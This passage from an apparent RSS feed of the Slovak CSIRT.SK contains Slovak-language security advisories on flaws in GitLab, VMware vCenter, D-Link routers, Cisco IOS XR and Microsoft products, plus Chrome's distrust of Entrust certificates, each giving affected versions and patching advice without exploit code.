chýbajúce alebo nesprávne informácie v položke <em>attributes</em> v súbore <em>auth_json</em>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/">https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45409">https://nvd.nist.gov/vuln/detail/CVE-2024-45409<span style="color:black"></span></a></li>



<li><a href="https://thehackernews.com/2024/09/gitlab-patches-critical-saml.html">https://thehackernews.com/2024/09/gitlab-patches-critical-saml.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1368/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Google Chrome prestáva od novembra 2024 dôverovať certifikátom Entrust</title>
		<link>/posts/1363</link>
					<comments>/posts/1363#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 18 Sep 2024 13:22:09 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Entrust]]></category>
		<guid isPermaLink="false">/?p=1363</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/entrust-logo.png.webp" alt="" /></p>V dnešnej dobe je zabezpečené spojenie s webovým serverom (prostredníctvom HTTPS) základom ochrany súkromia a bezpečnosti používateľov. Táto ochrana je...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/entrust-logo.png.webp" alt="" /></p>
<p><strong>V dnešnej dobe je zabezpečené spojenie s webovým serverom (prostredníctvom HTTPS) základom ochrany súkromia a bezpečnosti používateľov. Táto ochrana je zabezpečená certifikátmi, ktoré vydáva certifikačná autorita (CA). Certifikačná autorita zohráva kľúčovú úlohu pri dôveryhodnosti certifikátov. Od novembra 2024 však prehliadač Google Chrome prestane dôverovať certifikátom vydaným certifikačnou autoritou Entrust. Toto rozhodnutie bude mať výrazný dopad na webové stránky, ktoré používajú certifikáty od Entrust a ich používateľov.</strong></p>



<p><strong>Prečo Google Chrome prestane dôverovať Entrust?</strong></p>



<p>Google sa rozhodol pre tento krok kvôli opakujúcim sa zlyhaniam a nedostatkom, ktoré u spoločnosti Entrust pozoroval počas uplynulých šiestich rokov. Konkrétne ide o:</p>



<ol>
<li><strong>Zlyhania pri dodržiavaní predpisov:</strong> Entrust nedodržal niektoré zo základných bezpečnostných a prevádzkových štandardov stanovených v rámci politiky programu Chrome Root.</li>



<li><strong>Nesplnené záväzky:</strong> Spoločnosť Entrust nesplnila svoje sľuby týkajúce sa zlepšenia bezpečnostných opatrení.</li>



<li><strong>Nedostatočný pokrok:</strong> Spoločnosť Entrust nedokázala presvedčivo riešiť zraniteľnosti, ktoré boli identifikované v jej verejných správach o incidentoch.</li>
</ol>



<p>Tieto problémy oslabili dôveru spoločnosti Google v schopnosť spoločnosti Entrust správať sa ako spoľahlivá a dôveryhodná certifikačná autorita. Google tak vyhodnotil, že ďalšie uznávanie certifikátov Entrust predstavuje riziko pre bezpečnosť používateľov internetu.</p>



<p><strong>Kedy sa zmena uskutoční?</strong></p>



<p>Tento krok vstúpi do platnosti s aktualizáciou prehliadača Chrome 131, približne 12. novembra 2024. Po tomto dátume nebudú nové certifikáty vydané spoločnosťou Entrust automaticky dôveryhodné v prehliadači Chrome.</p>



<p><strong>Ako to ovplyvní používateľov?</strong></p>



<p>Po nadobudnutí účinnosti tohto opatrenia budú všetky webové stránky používajúce certifikáty vydané spoločnosťou Entrust po 11. novembri 2024 označené v prehliadači Chrome ako &#8220;nebezpečné&#8221;. Používatelia budú pri pokuse o prístup na takéto stránky varovaní správou, ako napríklad &#8220;Vaše pripojenie nie je súkromné.&#8221; To môže výrazne ovplyvniť reputáciu webových stránok a odradiť návštevníkov od ich používania. Staršie certifikáty, ktoré boli vydané pred týmto dátumom, zostanú dôveryhodné až do ich uplynutia.</p>



<p><strong>Aké webové stránky sú týmto opatrením ovplyvnené?</strong></p>



<p>Dopad na jednotlivé webové stránky závisí od toho, ako rýchlo prejdú na certifikáty inej dôveryhodnej certifikačnej autority. Webové stránky, ktoré naďalej používajú certifikáty spoločnosti Entrust vydané po 11. novembri 2024, budú označené ako nedôveryhodné. Ak si nie ste istí, akú certifikačnú autoritu používa váš web, môžete to jednoducho skontrolovať pomocou prehliadača Chrome:</p>



<ol>
<li>Otvorte webovú stránku vo vašom prehliadači.</li>



<li>Kliknite na ikonu &#8220;zámok&#8221; v paneli s adresou.</li>



<li>Vyberte &#8220;Pripojenie je zabezpečené&#8221; a následne &#8220;Certifikát je platný&#8221;.</li>



<li>V časti &#8220;Vydané od&#8221; skontrolujte, či sa v poli &#8220;Organizácia (O)&#8221; nachádza &#8220;Entrust&#8221; alebo &#8220;AffirmTrust.&#8221; Ak áno, odporúčame vykonať potrebné kroky na prechod k inej certifikačnej autorite.</li>
</ol>



<p><strong>Čo by mali robiť prevádzkovatelia webových stránok?</strong></p>



<p>Weboví operátori, ktorých sa táto zmena týka, by mali čo najskôr prejsť na novú verejne dôveryhodnú certifikačnú autoritu. Prechod by sa mal dokončiť pred vypršaním platnosti existujúcich certifikátov, najmä ak je ich platnosť naplánovaná po 11. novembri 2024.<br><br>Prevádzkovatelia môžu dočasne získať nový TLS certifikát od spoločnosti Entrust, aby oddialili dopad blokovania, ale časom budú musieť prejsť na certifikát od inej autority, ktorá je zahrnutá v Chrome Root Store.</p>



<p><strong>Dôležitosť a možné dopady</strong></p>



<p>Táto zmena je dôležitá, pretože certifikačné autority sú zodpovedné za zabezpečenie bezpečných šifrovaných pripojení medzi prehliadačmi a webovými stránkami. Ak CA neplní svoje povinnosti a nezaručuje bezpečnosť, môže to ohroziť súkromie a bezpečnosť používateľov internetu. Google preto trvá na dodržiavaní najvyšších štandardov bezpečnosti.</p>



<p><strong>Upozornenie pre používateľov:</strong></p>



<p>Od novembra môžu byť niektoré webové stránky označené ako nedôveryhodné. V takom prípade odporúčame byť opatrní a na stránkach nezadávať citlivé informácie, kým nedôjde k vyriešeniu problému s certifikátom.<br><br>Webové stránky a ich operátori by mali prijať okamžité kroky, aby sa vyhli negatívnemu dopadu na dôveryhodnosť ich webov a ochranu svojich návštevníkov.</p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://security.googleblog.com/2024/06/sustaining-digital-certificate-security.html?m=1">https://security.googleblog.com/2024/06/sustaining-digital-certificate-security.html?m=1</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1363/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická aktívne zneužívaná zraniteľnosť VMware vCenter Server</title>
		<link>/posts/1361</link>
					<comments>/posts/1361#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 18 Sep 2024 13:16:02 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">/?p=1361</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, opravujúce bezpečnostné chyby ovplyvňujúce VMware vCenter Server. Z nich 1 je označená ako kritická a 1 vysoko...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, opravujúce bezpečnostné chyby ovplyvňujúce VMware vCenter Server. Z nich 1 je označená ako kritická a 1 vysoko závažná. Zraniteľnosti možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu.</strong> <strong>Zraniteľnosti sú aktívne zneužívané.</strong><br><strong>[Aktualizované 20.11.2024]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>VMware vCenter Server 7.0, 8.0 </li>



<li>VMware Cloud Foundation 4.x, 5.x, 5.1.x</li>
</ul>



<p><em>Poznámka: vCenter Server je tiež súčasťou produktov VMware vSphere a VMware Cloud Foundation</em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-38812</strong> (CVSS skóre 9,8)<br>Chybu pretečenia haldy v implementácii protokolu DCE/RPC by vzdialený neautentifikovaný útočník mohol zneužiť na vykonanie škodlivého kódu. Zraniteľnosť možno zneužiť odoslaním špeciálne vytvoreného paketu.<br><em><span style="text-decoration: underline;">Aktualizácia 25.10.2024:</span> Spoločnosť Broadcom vydala ďalšie bezpečnostné aktualizácie pre opravu kritickej zraniteľnosti CVE-2024-38812, ktorá bola nedostatočne opravená v septembri 2024.</em><br><br><strong>CVE-2024-38813</strong> (CVSS skóre 7,5)<br>Vysoko závažná zraniteľnosť CVE-2024-38813 umožňuje útočníkovi so sieťovým prístupom zvýšiť oprávnenia na úroveň root prostredníctvom odoslania špeciálne vytvoreného paketu.</p>



<p><em><span style="text-decoration: underline;">Aktualizácia 20.11.2024:</span> Spoločnosť Broadcom informovala o aktívnom zneužívaní oboch zraniteľností.</em></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vzdialené vykonávanie kódu </li>



<li>Zvýšenie privilégií</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia VMware vCenter Server na verzie <a href="https://docs.vmware.com/en/VMware-vSphere/8.0/rn/vsphere-vcenter-server-80u3d-release-notes/index.html" data-type="link" data-id="https://docs.vmware.com/en/VMware-vSphere/8.0/rn/vsphere-vcenter-server-80u3d-release-notes/index.html">8.0 U3d</a>, <a href="https://docs.vmware.com/en/VMware-vSphere/8.0/rn/vsphere-vcenter-server-80u2e-release-notes/index.html" data-type="link" data-id="https://docs.vmware.com/en/VMware-vSphere/8.0/rn/vsphere-vcenter-server-80u2e-release-notes/index.html">8.0 U2e</a>, <a href="https://docs.vmware.com/en/VMware-vSphere/7.0/rn/vsphere-vcenter-server-70u3t-release-notes/index.html" data-type="link" data-id="https://docs.vmware.com/en/VMware-vSphere/7.0/rn/vsphere-vcenter-server-70u3t-release-notes/index.html">7.0 U3t</a>. Keďže je vCenter Server súčasťou VMware Cloud Foundation, výrobca odporúča aj inštaláciu aktualizácií&nbsp;<a href="https://knowledge.broadcom.com/external/article?legacyId=88287" data-type="link" data-id="https://knowledge.broadcom.com/external/article?legacyId=88287">KB88287</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38812 ">https://nvd.nist.gov/vuln/detail/CVE-2024-38812<span style="font-size:12.0pt;line-height:107%;font-family:&quot;Times New Roman&quot;,serif"></span></a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38813 &nbsp; ">https://nvd.nist.gov/vuln/detail/CVE-2024-38813</a></li>



<li><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968</a></li>



<li><a href="https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md">https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1361/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti routerov D-Link</title>
		<link>/posts/1351</link>
					<comments>/posts/1351#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 18 Sep 2024 13:10:05 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[D-Link]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1351</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/D-Link-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť D-Link opravila tri kritické a&#160;dve vysoko závažné zraniteľnosti vo firmvéroch zariadení COVR-X1870, DIR-X4860 a&#160;DIR-X5460. Zraniteľnosti súvisia s&#160;napevno kódovanými prihlasovacími...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/D-Link-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť D-Link opravila tri kritické a&nbsp;dve vysoko závažné zraniteľnosti vo firmvéroch zariadení COVR-X1870, DIR-X4860 a&nbsp;DIR-X5460. Zraniteľnosti súvisia s&nbsp;napevno kódovanými prihlasovacími údajmi a&nbsp;ďalšími chybami, ktoré umožňujú vzdialene vykonávať kód, pristupovať k&nbsp;zariadeniam cez Telnet a&nbsp;vykonávať systémové príkazy.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>COVR-X1870 rev.Ax, (non-US) firmware verzia 1.02 a staršie</li>



<li>DIR-X4860 rev.Ax, firmware verzia 1.04B04_Hot-Fix a staršie<span style="font-size:11.0pt;font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:
minor-latin;mso-hansi-theme-font:minor-latin;mso-bidi-theme-font:minor-latin;
color:black;font-weight:normal;mso-bidi-font-weight:bold"></span> </li>



<li>DIR-X5460 rev.Ax, firmware verzia 1.11B01_Hot-Fix a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť D-Link opravila kritické zraniteľnosti v troch routeroch (COVR-X1870, DIR-X4860 a DIR-X5460). Dve z chýb umožňujú vzdialene vykonávať kód a tri dovoľujú prístup ku zariadeniam s napevno kódovanými prihlasovacími údajmi.</p>



<p><strong>CVE-2024-45694, CVE-2024-45695</strong> (CVSS skóre 9,8)</p>



<p>Zraniteľnosti pretečenia medzipamäte na zásobníku, ktoré umožňujú neautentifikovaným útočníkom vzdialene vykonávať kód.</p>



<p><strong>CVE-2024-45697</strong> (CVSS skóre 9,8)</p>



<p>Zraniteľnosť súvisí s povolením protokolu telnet, keď je zapojený port WAN. Útočník tak môže získať prístup s použitím prihlasovacích údajov napevno zadaných v zdrojovom kóde.</p>



<p><strong>CVE-2024-45696 , CVE-2024-45698</strong> (CVSS skóre 8,8)</p>



<p>Prvá zraniteľnosť útočníkom umožňuje pomocou napevno kódovaných prihlasovacích údajov vynútiť povolenie telnetu na lokálnej sieti. Druhá im následne umožňuje vzdialene sa prihlásiť spomenutými prihlasovacími údajmi a vykonávať systémové príkazy, kvôli nedostatočnej kontrole používateľských vstupov.<br><br>Zraniteľnosti objavil tím TWCERT.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vzdialené vykonávanie kódu </li>



<li>Kompromitácia zariadení</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na</p>



<ul>
<li>COVR-X1870 rev.Ax, firmware verzia v1.03B01</li>



<li>DIR-X4860 rev.Ax, firmware verzia v1.04B05<span style="font-size:11.0pt;
font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:minor-latin;mso-hansi-theme-font:
minor-latin;mso-bidi-theme-font:minor-latin;color:black;font-weight:normal;
mso-bidi-font-weight:bold"></span> </li>



<li>DIR-X5460 rev.Ax, firmware verzia DIR-X5460A1_V1.11B04</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10412  ">https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10412  </a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/d-link-fixes-critical-rce-hardcoded-password-flaws-in-wifi-6-routers/ ">https://www.bleepingcomputer.com/news/security/d-link-fixes-critical-rce-hardcoded-password-flaws-in-wifi-6-routers/ </a></li>



<li><a href="https://www.securityweek.com/d-link-patches-critical-router-vulnerabilities/">https://www.securityweek.com/d-link-patches-critical-router-vulnerabilities/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1351/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – august 2024</title>
		<link>/posts/1344</link>
					<comments>/posts/1344#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Sep 2024 09:01:07 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<guid isPermaLink="false">/?p=1344</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci august 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci august 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/09/MS202408-new.pdf" data-type="link" data-id="/wp-content/uploads/2024/09/MS202408-new.pdf">Mesačná správa – 08/2024 PDF (1 728 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1344/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti v Cisco IOS XR</title>
		<link>/posts/1345</link>
					<comments>/posts/1345#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Sep 2024 08:50:37 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1345</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť CISCO vydala bezpečnostné aktualizácie na svoj operačný systém IOS XR, ktoré opravujú 8 zraniteľností, z čoho 6 je označených...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť CISCO vydala bezpečnostné aktualizácie na svoj operačný systém IOS XR, ktoré opravujú 8 zraniteľností, z čoho 6 je označených ako vysoko závažné. Zraniteľnosti s&nbsp;označením CVE-2024-20398, CVE-2024-20304, CVE-2024-20483, CVE-2024-20489, CVE-2024-20317 a CVE-2024-20406 možno zneužiť na injekciu príkazov, vykonanie škodlivého kódu, eskaláciu privilégií, zneprístupnenie služby a získanie neoprávneného prístupu k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco IOS XR vo verziách starších ako 7.11.21 (október 2024)</li>



<li>Cisco IOS XR vo verziách starších ako 24.2.2</li>
</ul>



<p><em>Pozn. Konkrétne typy zasiahnutých zariadení a&nbsp;platforiem nájdete na stránkach výrobcu v&nbsp;časti „Affected Products“.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-20398 </strong>(CVSS skóre 8,8)</p>



<p>Zraniteľnosť sa nachádza v&nbsp;príkazovom riadku a spočíva v nedostatočnom overovaní používateľských vstupov. Lokálny autentifikovaný útočník by ju prostredníctvom špeciálne vytvorených príkazov mohol zneužiť na eskaláciu privilégií na úroveň používateľa <em>root</em>.</p>



<p><strong>CVE-2024-20304 </strong>(CVSS skóre 8,6)</p>



<p>Uvedenú zraniteľnosť by vzdialený neautentifikovaný útočník vedel zneužiť na zneprístupnenie služby. Nachádza sa vo funkcii Mtrace2 a&nbsp;spočíva v&nbsp;nesprávnom spracovaní obsahu pamäte UDP paketov.</p>



<p><strong>CVE-2024-20483, CVE-2024-20489&nbsp; </strong>(CVSS skóre 8,4)</p>



<p>Komponent Routed Passive Optical Network (PON)&nbsp; Controller obsahuje zraniteľnosti, ktoré by lokálny autentifikovaný útočník mohol zneužiť na injekciu príkazov a&nbsp;vykonanie škodlivého kódu. Zraniteľnosti je možné zneužiť na zariadeniach, na ktorých je aktivovaná funkcia Routed PON Controller.</p>



<p><strong>CVE-2024-20317 </strong>(CVSS skóre 7,4)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesprávnej klasifikácii určitých typov Ethernetových rámcov a&nbsp;neautentifikovaný útočník nachádzajúci sa v&nbsp;rovnakom sieťovom segmente by ju mohol zneužiť na zneprístupnenie služby.</p>



<p><strong>CVE-2024-20406</strong> (CVSS skóre 7,4)</p>



<p>CVE-2024-20406 spočíva v&nbsp;nedostatočnom overovaní vstupov v&nbsp;prichádzajúcich IS-IS (Intermediate System-to-Intermediate System) paketoch a&nbsp;možno ju zneužiť na zneprístupnenie služby.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Administrátorom a používateľom odporúčame vykonať aktualizáciu zasiahnutých systémov.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416">https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416</a> <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-priv-esc-CrG5vhCq">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-priv-esc-CrG5vhCq</a></p>



<p><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pak-mem-exhst-3ke9FeFy">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pak-mem-exhst-3ke9FeFy</a></p>



<p><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-ponctlr-ci-OHcHmsFL">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-ponctlr-ci-OHcHmsFL</a></p>



<p><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-l2services-2mvHdNuC">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-l2services-2mvHdNuC</a><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-isis-xehpbVNe">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-isis-xehpbVNe</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1345/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>GitLab opravuje kritickú a vysoko závažné zraniteľnosti</title>
		<link>/posts/1341</link>
					<comments>/posts/1341#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Sep 2024 15:26:39 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[GitLab]]></category>
		<guid isPermaLink="false">/?p=1341</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>Spoločnosť GitLab vydala opravný balík pre 18 zraniteľností. Z toho jedna je hodnotená ako kritická a tri ako vysoko závažné. Chyby umožňujú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>
<p><strong>Spoločnosť GitLab vydala opravný balík pre 18 zraniteľností. Z toho jedna je hodnotená ako kritická a tri ako vysoko závažné. Chyby umožňujú vzdialene vykonávať príkazy, spôsobiť nedostupnosť služby alebo vykonať útoky typu SSRF (Server-side request forgery).</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GitLab Community Edition (CE) staršie ako 17.3.2, 17.2.5, 17.1.7</li>



<li>GitLab Enterprise Edition (EE) staršie ako 17.3.2, 17.2.5, 17.1.7</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-6678</strong> (CVSSv3.1 skóre 9,9)</p>



<p>Kritická zraniteľnosť GitLab CE a EE, ktorá umožňuje útočníkovi spustiť pipeline s oprávneniami ľubovoľného používateľa. Vzdialený útočník môže vykonať akciu „stop“.</p>



<p><strong>CVE-2024-8640</strong> (CVSSv3.1 skóre 8,5), <strong>CVE-2024-8635</strong> (CVSSv3.1 skóre 7,7), <strong>CVE-2024-8124</strong> (CVSSv3.1 skóre 7,5)</p>



<p>Vysoko závažné zraniteľnosti GitLab. Prvé dve umožňujú vo verzii EE kvôli nedostatočnému overovaniu vstupov injektovať príkazy cez konfiguráciu YAML do pripojeného serveru Cube a pomocou útoku SSRF vykonávať cez Maven Dependency Proxy URL požiadavky na vnútorné zdroje. Posledná chyba zasahuje verziu EE aj CE a dovoľuje spôsobiť nedostupnosť služby, keď útočník zašle dostatočne veľký parameter <em>glm_source</em>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie príkazov </strong></li>



<li><strong>Nedostupnosť služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Platformy GitLab.com a GitLab Dedicated sú voči vyššie uvedeným zraniteľnostiam už zabezpečené. Ak spravujete svoju vlastnú inštanciu GitLab, odporúčame bezodkladnú aktualizáciu na </p>



<ul>
<li>GitLab Community Edition (CE) 17.3.2, 17.2.5 alebo 17.1.7</li>



<li>GitLab Enterprise Edition (EE) 17.3.2, 17.2.5 alebo 17.1.7</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-pipeline-execution-vulnerability/">https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-pipeline-execution-vulnerability/</a></li>



<li><a href="https://about.gitlab.com/releases/2024/09/11/patch-release-gitlab-17-3-2-released/">https://about.gitlab.com/releases/2024/09/11/patch-release-gitlab-17-3-2-released/</a></li>



<li><a href="https://trustsnew.com/gitlab-issues-critical-patch-releases-versions-17-3-2-17-2-5-and-17-1-7-address-key-vulnerabilities/">https://trustsnew.com/gitlab-issues-critical-patch-releases-versions-17-3-2-17-2-5-and-17-1-7-address-key-vulnerabilities/</a></li>



<li><a href="https://thehackernews.com/2024/09/urgent-gitlab-patches-critical-flaw.html">https://thehackernews.com/2024/09/urgent-gitlab-patches-critical-flaw.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1341/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci septembrového Patch Tuesday opravil 7 kritických zraniteľností</title>
		<link>/posts/1339</link>
					<comments>/posts/1339#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Sep 2024 09:26:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Spoofing]]></category>
		<guid isPermaLink="false">/?p=1339</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v&#160;septembri 2024 balík opráv pre portfólio svojich produktov opravujúci 79 zraniteľností, z&#160;ktorých 19 umožňuje vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v&nbsp;septembri 2024 balík opráv pre portfólio svojich produktov opravujúci 79 zraniteľností, z&nbsp;ktorých 19 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v&nbsp;produktoch Microsoft SharePoint Server, Azure Web Apps a Azure Stack Hub a&nbsp;v komponentoch Windows Network Address Translation a Microsoft Windows Update a&nbsp;možno ich zneužiť na eskaláciu privilégií a&nbsp;vzdialené vykonanie škodlivého kódu. Zraniteľnosti s&nbsp;označením CVE-2024-38014, CVE-2024-38217, CVE-2024-38226, CVE-2024-43491 v Microsoft Publisher a&nbsp;komponentoch Windows Installer, MOTW (Mark of the Web) a&nbsp;Windows Update sú aktívne zneužívané útočníkmi.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Azure CycleCloud 8.0.0</li>



<li>Azure CycleCloud 8.0.1</li>



<li>Azure CycleCloud 8.0.2</li>



